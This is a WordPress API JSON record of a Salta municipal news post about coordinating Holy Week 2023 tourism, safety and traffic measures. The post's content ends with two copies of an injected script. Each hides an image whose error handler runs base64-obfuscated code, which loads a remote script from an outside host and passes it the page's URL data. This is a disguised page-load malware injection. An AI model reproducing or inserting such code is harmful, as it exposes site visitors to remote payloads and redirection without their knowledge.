{"id":2419,"date":"2023-03-28T12:44:40","date_gmt":"2023-03-28T15:44:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2419"},"modified":"2025-08-14T00:20:15","modified_gmt":"2025-08-14T03:20:15","slug":"funcionarios-municipales-coordinaron-acciones-para-semana-santa-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2419","title":{"rendered":"Funcionarios municipales coordinaron acciones para Semana Santa 2023"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#cd1751\"><strong><em>Se dispondr\u00e1n trabajos coordinados entre las distintas \u00e1reas municipales. Tiene por objetivo brindar mayor seguridad y tranquilidad a las actividades que realicen tanto iglesias como grupos.<\/em><\/strong><\/h3>\n\n\n\n<p>La Municipalidad de Salta planifica acciones para la pr\u00f3xima Semana Santa 2023.&nbsp;<\/p>\n\n\n\n<p>Funcionarios de las distintas \u00e1reas municipales coordinaron acciones conjuntas debido a la gran afluencia de turistas y visitantes que tiene la ciudad durante las fechas, ya que se trata de uno de los destinos m\u00e1s atrayentes para viajeros locales, nacionales y extranjeros.<\/p>\n\n\n\n<p>El objetivo es seguir fortaleciendo la estrategia tur\u00edstica a trav\u00e9s del trabajo en conjunto, que permita sostener a Salta como una ciudad accesible, segura y ordenada.<\/p>\n\n\n\n<p>Asimismo, tiene por finalidad brindar mayor seguridad y tranquilidad a las actividades que realicen tanto iglesias como grupos.<\/p>\n\n\n\n<p>De igual manera, para la Semana Santa se dispuso establecer un amplio dispositivo de ordenamiento vial, recordando que quedar\u00e1 vedada la circulaci\u00f3n de unidades de transporte de pasajeros (doble piso), tal como establece la Ordenanza municipal en vigencia, en el per\u00edmetro comprendido por calles Buenos Aires, 20 de Febrero, Ituzaing\u00f3, De\u00e1n Funes y C\u00f3rdoba.<\/p>\n\n\n\n<p>Participaron de la reuni\u00f3n: el secretario de Cultura y Turismo, Fernando Garc\u00eda Soria; la interventora de Espacio P\u00fablico, Susana Pontussi; el secretario de Movilidad Ciudadana, Gilberto Pereyra, y de Protecci\u00f3n Ciudadana, Jorge Altamirano, entre otros.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2421\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-1024x576.jpg\" alt=\"\" class=\"wp-image-2421\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-1536x864.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3-747x420.jpg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-3.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"577\" data-id=\"2422\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-1024x577.jpg\" alt=\"\" class=\"wp-image-2422\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-1024x577.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-768x433.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-1536x866.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-1068x602.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4-745x420.jpg 745w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/previa-semana-santa-4.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se dispondr\u00e1n trabajos coordinados entre las distintas \u00e1reas municipales. Tiene por objetivo brindar mayor seguridad y tranquilidad a las actividades que realicen tanto iglesias como grupos. La Municipalidad de Salta planifica acciones para la pr\u00f3xima Semana Santa 2023.&nbsp; Funcionarios de las distintas \u00e1reas municipales coordinaron acciones conjuntas debido a la gran afluencia de turistas y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2420,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,2,18],"tags":[],"class_list":{"0":"post-2419","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-religiosos","10":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2419"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2419"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2419\/revisions"}],"predecessor-version":[{"id":7132,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2419\/revisions\/7132"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2420"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2419"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2419"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2419"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}